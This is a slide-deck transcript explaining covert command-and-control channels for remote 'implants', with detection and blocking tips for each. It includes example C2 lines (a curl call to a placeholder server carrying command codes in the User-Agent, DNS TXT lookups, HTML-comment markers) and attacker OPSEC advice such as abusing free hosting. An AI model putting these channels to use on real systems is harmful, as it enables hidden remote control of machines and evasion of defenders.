Beneath the Radar: covert traffic on the web

Transcript

1. Covert Comms Benjamin Scott github.com/benjaminxscott

2. The Basics What do we want? Remote control of a

   machine via “implant” process How do we get it? Send commands over network and get responses

3. Enter the Arena DNS & Routing IP + Port =

   Socket Destination Source Gateway & Firewall Local Processes - Implant - Antivirus Socket

4. Types of Secrecy Encryption = I see data but cannot

   make sense of it Covert Channel = I have no idea what to look for Observer (man in the middle)

5. Talking Back • Direct = Connect to control server ◦

   Negotiation-based, low latency ◦ Good for live interaction ◦ i.e. TCP, SSH, RDP • Indirect = Connect to intermediate server ◦ Stealthy, high latency ◦ Good for asynchronous commands / responses ◦ i.e. P2P, social media posts, HTML comments

6. What are we sending? • Implant ◦ Info about host

   ◦ Unique ID • Server ◦ Commands ◦ Configuration details Jimbob Jones | 655321 | Admin | WinXP | 10.1.0.1

7. Common Commands Heartbeat = Are you still there? Get_Summary =

   Give me your information Start_Interaction = I want a command session Transfer_File = Send a particular file Execute_Command = Run and send the results

8. Filtering Methods • Source: ◦ Antivirus = prevent connections from

   process ◦ Firewall = IP + port access lists • Gateway, Routing: ◦ DNS sinkhole = blacklist suspicious domains ◦ IDS = drop connections with scary data ◦ Protocol filtering = inspect packets

9. UserAgent (direct) Implant generates UA with command codes Server parses

   and replies curl $server -A “AppleWebKit/531.($command)” Detection: Look for uncommon UserAgents Blocking: Use a web proxy to standardize outgoing UAs (i.e. fake_user_agent in squid)

10. DNS TXT records (indirect) Server populates command to nameserver TXT

    record Implant parses DNS TXT record for domain dig $domain txt Detect: Log DNS queries and investigate odd ones Blocking: Run your own DNS, never ask for authoritative records, only cache from trusted sources

11. HTML comments (indirect) Server encodes commands in comments Implant parses

    from between markers <!-->marker $command marker<--> Detection: very difficult Blocking: Use a web proxy to filter incoming comments (i.e. ProxyHTMLStripComments On in squid)

12. Implant Development Choose platform / language to support Cache data

    locally Use dynamic reconfiguration Have a strict build process to strip debug info

13. Server Maintenance • Taking Action ◦ alerting on interesting events

    ◦ parsing collected data • Storage and backup ◦ common interface and DB backend ◦ log rolling & archival • Scaling ◦ patching ◦ rolling infrastructure

14. OPSEC Considerations • Technical Protection ◦ Public key crypto and

    disk encryption ◦ Proxies / Tor relays • Stay under the radar ◦ Keep people from spidering your server ◦ Abuse free hosting and open-source implants

15. Questions? tiny.cc/covertcomms